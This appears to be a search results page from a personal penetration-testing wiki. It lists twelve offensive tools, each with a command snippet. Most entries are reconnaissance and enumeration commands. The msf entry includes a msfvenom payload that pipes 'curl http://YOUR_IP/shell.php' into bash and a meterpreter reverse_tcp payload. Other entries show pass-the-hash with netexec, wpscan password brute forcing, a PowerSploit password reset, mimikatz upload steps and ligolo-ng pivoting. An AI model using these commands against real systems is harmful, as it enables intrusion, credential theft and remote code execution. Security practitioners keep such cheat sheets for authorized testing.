Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

12 total results found

autorecon

Hacking Tools

Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the below sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv

Primary Function
Recon
Secondary Function

nmap

Hacking Tools

Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 target nmap IP scan multiple targets nmap IP1, IP2, IP3 scan a list nmap -iL list.txt scan CIDR range nmap 192.168.1.0/24 Ports Purpose...

Primary Function
Recon

wpscan

Hacking Tools

Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p Scan for users wpscan --url http://TARGET_IP -e u Scan for vulnerable plugins wpscan --url http://TARGET_IP -e vp Brute force passwords wpscan --url http://T...

Primary Function
Enumeration

fuff

Hacking Tools

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ

Primary Function
Enumeration

nikto

Hacking Tools

Basic usage nikto -host http://TARGET_IP -p PORT

Primary Function
Enumeration

gobuster

Hacking Tools

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/direc...

Primary Function
Enumeration

netexec

Hacking Tools

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H '...

Primary Function
Enumeration
Secondary Function
Privilege Escalation
Secondary Function
Pivot

powerview

Hacking Tools

1. Enumerate common names Get-DomainComputer | select cn

Primary Function
Enumeration

msf

Hacking Tools

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payl...

Primary Function
Privilege Escalation

powersploit

Hacking Tools

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword

Primary Function
Privilege Escalation

mimikatz

Hacking Tools

You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell power...

Primary Function
Pivot
Secondary Function
Privilege Escalation
Secondary Function
Enumeration

ligolo-ng

Hacking Tools

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Primary Function
Pivot